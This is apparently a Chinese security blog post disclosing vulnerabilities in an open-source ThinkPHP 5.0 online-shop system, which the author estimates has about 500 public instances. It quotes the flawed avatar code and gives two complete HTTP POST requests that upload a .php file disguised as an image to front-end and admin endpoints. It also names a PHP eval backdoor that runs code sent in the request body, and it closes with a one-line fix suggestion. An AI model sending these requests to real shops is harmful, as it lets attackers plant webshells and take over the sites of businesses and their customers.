商城采用thinkphp5.0+MySQL开发语言开发,完全开源商城系统,可以用于企业,个人建立自己的网上免费商城,支持开源微信商城,开源小程序等
这是偶然发现的一套程序。比较小众用的人数不是很多。根据fofa的搜索目测独立IP数量在500+左右
前台后台任意文件上传
public function updateUserImg($uid, $type){ Log::write('开始更新会员头像'); $condition = array( 'uid' => $uid ); $user_info = $this->user->getInfo($condition, $field = 'uid,qq_info,wx_info'); $qq_info = $user_info['qq_info']; $wx_info = $user_info['wx_info']; if($type=='qq'){ $qq_info_array = json_decode($qq_info, true); $user_head_img = $qq_info_array['figureurl_qq_2']; }elseif($type=='wchat'){ //Log::write('微信信息: ' . $wx_info); $wx_info_array = json_decode($wx_info, true); $user_head_img = $wx_info_array['headimgurl']; }else{ $user_head_img = ''; } $local_path = ''; if(!empty($user_head_img)) { if(!file_exists('upload/user')){ $mode = intval('0777',8); mkdir('upload/user',$mode,true); if(!file_exists('upload/user')) { die('upload/user不可写,请检验读写权限!'); } } $local_path = 'upload/user/'.time().rand(111,999).'.png'; save_weixin_img($local_path, $user_head_img); } if(!empty($local_path)) { $retval = $this->user->save(['user_headimg' => $local_path,], ['uid' => $uid]); }else{ $retval = 0; } return $retval; }
未进行任何的过滤,导致任意文件写入
利用:
POST /index.php?s=/member/person HTTP/1.1 Host: xxxx Content-Length: 924 Cache-Control: max-age=0 Origin: http://xxxx Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySuT4zF1iypR1XEll User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://xxxx/index.php?s=/member/person Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D Connection: close ------WebKitFormBoundarySuT4zF1iypR1XEll Content-Disposition: form-data; name="user_headimg"; filename="5e5cbbe4725bb.php" Content-Type: image/jpeg ------WebKitFormBoundarySuT4zF1iypR1XEll Content-Disposition: form-data; name="act" act_edit_img ------WebKitFormBoundarySuT4zF1iypR1XEll Content-Disposition: form-data; name="submit2" 确认修改 ------WebKitFormBoundarySuT4zF1iypR1XEll--
后台同样未进行任何的过滤
POST /index.php?s=/wap/upload/uploadfile HTTP/1.1 Host: xxxx Content-Length: 73793 Cache-Control: max-age=0 Origin: http://xxxx Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryilA30KLVw3Nyddto User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://xxxx/index.php?s=/admin/auth/userdetail Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D Connection: close ------WebKitFormBoundaryilA30KLVw3Nyddto Content-Disposition: form-data; name="file_path" upload/avator/ ------WebKitFormBoundaryilA30KLVw3Nyddto Content-Disposition: form-data; name="file_upload"; filename="5e5cbbe4725bb.php" Content-Type: image/jpeg xxxx ------WebKitFormBoundaryilA30KLVw3Nyddto--
任意命令执行后门
eval('?>' . file_get_contents('php://input'));
修复建议:直接删除phpunit 或者修改为stdin
本文作者为lufei,转载请注明。